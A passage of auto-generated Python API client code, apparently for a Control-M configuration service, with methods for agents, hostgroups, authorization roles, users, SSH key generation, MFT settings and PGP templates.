noqa: E501 return data def generate_mft_rsa_ssh_key_with_http_info(self, server, agent, ssh_key_properties, **kwargs): # noqa: E501 """Generate RSA SSH Key # noqa: E501 Generate RSA SSH Key pair for SFTP account authentication # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param SshKeyProperties ssh_key_properties: Ssh Key pair properites (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'ssh_key_properties'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method generate_mft_rsa_ssh_key" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 # verify the required parameter 'ssh_key_properties' is set if self.api_client.client_side_validation and ('ssh_key_properties' not in params or params['ssh_key_properties'] is None): # noqa: E501 raise ValueError("Missing the required parameter `ssh_key_properties` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'ssh_key_properties' in params: body_params = params['ssh_key_properties'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/ssh/key', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_agent_parameters(self, server, agent, **kwargs): # noqa: E501 """get agent parameters # noqa: E501 Get all the parameters of the specified Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agent_parameters(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to query. (required) :param bool extended_data: True to return more agent parameters. HIDDEN :return: KeyValueListResult If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_agent_parameters_with_http_info(self, server, agent, **kwargs): # noqa: E501 """get agent parameters # noqa: E501 Get all the parameters of the specified Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agent_parameters_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to query. (required) :param bool extended_data: True to return more agent parameters. HIDDEN :return: KeyValueListResult If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'extended_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_agent_parameters" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_agent_parameters`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_agent_parameters`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] if 'extended_data' in params: query_params.append(('extendedData', params['extended_data'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/params', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='KeyValueListResult', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_agents(self, server, **kwargs): # noqa: E501 """get Server agents # noqa: E501 Get all the agents of the specified Server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agents(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required) :param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname` :return: AgentDetailsList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_agents_with_http_info(server, **kwargs) # noqa: E501 else: (data) = self.get_agents_with_http_info(server, **kwargs) # noqa: E501 return data def get_agents_with_http_info(self, server, **kwargs): # noqa: E501 """get Server agents # noqa: E501 Get all the agents of the specified Server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agents_with_http_info(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required) :param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname` :return: AgentDetailsList If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_agents" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_agents`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] if 'agent' in params: query_params.append(('agent', params['agent'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agents', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AgentDetailsList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_all_authorization_roles(self, **kwargs): # noqa: E501 """Get Authorization Roles # noqa: E501 Get Authorization Roles # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_authorization_roles(async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. :param str description: The Role description. :return: RoleHeaderList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_all_authorization_roles_with_http_info(**kwargs) # noqa: E501 return data def get_all_authorization_roles_with_http_info(self, **kwargs): # noqa: E501 """Get Authorization Roles # noqa: E501 Get Authorization Roles # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_authorization_roles_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. :param str description: The Role description. :return: RoleHeaderList If the method is called asynchronously, returns the request thread. """ all_params = ['role', 'description'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_all_authorization_roles" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'role' in params: query_params.append(('role', params['role'])) # noqa: E501 if 'description' in params: query_params.append(('description', params['description'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/roles', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleHeaderList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_all_organization_groups(self, **kwargs): # noqa: E501 """Get All organization groups # noqa: E501 Get All organization groups # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_organization_groups(async_req=True) >>> result = thread.get() :param async_req bool :param str organizationgroup: The organization group name. :return: list[str] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_all_organization_groups_with_http_info(**kwargs) # noqa: E501 return data def get_all_organization_groups_with_http_info(self, **kwargs): # noqa: E501 """Get All organization groups # noqa: E501 Get All organization groups # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_organization_groups_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param str organizationgroup: The organization group name. :return: list[str] If the method is called asynchronously, returns the request thread. """ all_params = ['organizationgroup'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_all_organization_groups" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'organizationgroup' in params: query_params.append(('organizationgroup', params['organizationgroup'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/organizationgroups', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[str]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_all_roles_associated_with_organization_group(self, organizationgroup, **kwargs): # noqa: E501 """Get Authorization Roles associated with an organization group # noqa: E501 Get Authorization Roles associated with an organization group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_roles_associated_with_organization_group(organizationgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str organizationgroup: Name of organization group (required) :param str role: The Role name. :return: list[str] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501 else: (data) = self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs) # noqa: E501 return data def get_all_roles_associated_with_organization_group_with_http_info(self, organizationgroup, **kwargs): # noqa: E501 """Get Authorization Roles associated with an organization group # noqa: E501 Get Authorization Roles associated with an organization group # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str organizationgroup: Name of organization group (required) :param str role: The Role name. :return: list[str] If the method is called asynchronously, returns the request thread. """ all_params = ['organizationgroup', 'role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_all_roles_associated_with_organization_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'organizationgroup' is set if self.api_client.client_side_validation and ('organizationgroup' not in params or params['organizationgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `organizationgroup` when calling `get_all_roles_associated_with_organization_group`") # noqa: E501 collection_formats = {} path_params = {} if 'organizationgroup' in params: path_params['organizationgroup'] = params['organizationgroup'] # noqa: E501 query_params = [] if 'role' in params: query_params.append(('role', params['role'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/organizationgroup/{organizationgroup}/roles', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[str]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_all_users(self, **kwargs): # noqa: E501 """Get users # noqa: E501 Get users # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_users(async_req=True) >>> result = thread.get() :param async_req bool :param str name: The user name. :param str full_name: The user full name. :param str description: The user description. :return: list[UserHeader] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_all_users_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_all_users_with_http_info(**kwargs) # noqa: E501 return data def get_all_users_with_http_info(self, **kwargs): # noqa: E501 """Get users # noqa: E501 Get users # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_all_users_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param str name: The user name. :param str full_name: The user full name. :param str description: The user description. :return: list[UserHeader] If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'full_name', 'description'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_all_users" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'name' in params: query_params.append(('name', params['name'])) # noqa: E501 if 'full_name' in params: query_params.append(('fullName', params['full_name'])) # noqa: E501 if 'description' in params: query_params.append(('description', params['description'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/users', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[UserHeader]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_fts_settings(self, server, agent, **kwargs): # noqa: E501 """Get File Transfer Server (FTS) configuration data. # noqa: E501 Get File Transfer Server (FTS) configuration data. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_fts_settings(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: FtsSettingsData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_fts_settings_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_fts_settings_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_fts_settings_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get File Transfer Server (FTS) configuration data. # noqa: E501 Get File Transfer Server (FTS) configuration data. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_fts_settings_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: FtsSettingsData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_fts_settings" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_fts_settings`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_fts_settings`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/fts/settings', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='FtsSettingsData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_hostgroups(self, server, **kwargs): # noqa: E501 """get Server hostgroups # noqa: E501 Get all the hostgroups of the specified Server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_hostgroups(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroups belong to. (required) :return: StringListResult If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_hostgroups_with_http_info(server, **kwargs) # noqa: E501 else: (data) = self.get_hostgroups_with_http_info(server, **kwargs) # noqa: E501 return data def get_hostgroups_with_http_info(self, server, **kwargs): # noqa: E501 """get Server hostgroups # noqa: E501 Get all the hostgroups of the specified Server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_hostgroups_with_http_info(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroups belong to. (required) :return: StringListResult If the method is called asynchronously, returns the request thread. """ all_params = ['server'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_hostgroups" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_hostgroups`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroups', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='StringListResult', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_hosts_in_group(self, server, hostgroup, **kwargs): # noqa: E501 """get hostgroup agents # noqa: E501 Get the agents that compose the specified hostgroup # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_hosts_in_group(server, hostgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :return: AgentsInGroupListResult If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501 else: (data) = self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs) # noqa: E501 return data def get_hosts_in_group_with_http_info(self, server, hostgroup, **kwargs): # noqa: E501 """get hostgroup agents # noqa: E501 Get the agents that compose the specified hostgroup # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_hosts_in_group_with_http_info(server, hostgroup, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :return: AgentsInGroupListResult If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_hosts_in_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_hosts_in_group`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `get_hosts_in_group`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}/agents', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AgentsInGroupListResult', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_identity_provider_metadata(self, **kwargs): # noqa: E501 """Get identity Provider Metadata file # noqa: E501 Get identity Provider Metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_identity_provider_metadata(async_req=True) >>> result = thread.get() :param async_req bool :return: str If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_identity_provider_metadata_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_identity_provider_metadata_with_http_info(**kwargs) # noqa: E501 return data def get_identity_provider_metadata_with_http_info(self, **kwargs): # noqa: E501 """Get identity Provider Metadata file # noqa: E501 Get identity Provider Metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_identity_provider_metadata_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: str If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_identity_provider_metadata" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/systemsettings/saml2identityprovidermetadata', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='str', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_mft_configuration(self, server, agent, **kwargs): # noqa: E501 """Get MFT Configuration # noqa: E501 Get MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_mft_configuration(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: MftConfigurationData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_mft_configuration_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get MFT Configuration # noqa: E501 Get MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_mft_configuration_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: MftConfigurationData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_mft_configuration" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_mft_configuration`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_mft_configuration`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/configuration', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='MftConfigurationData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_pgp_templates(self, server, agent, **kwargs): # noqa: E501 """Get PGP Templates # noqa: E501 Get PGP Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_pgp_templates(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The PGP Template Name :return: list[PgpTemplateData] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_pgp_templates_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get PGP Templates # noqa: E501 Get PGP Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_pgp_templates_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The PGP Template Name :return: list[PgpTemplateData] If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_pgp_templates" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise 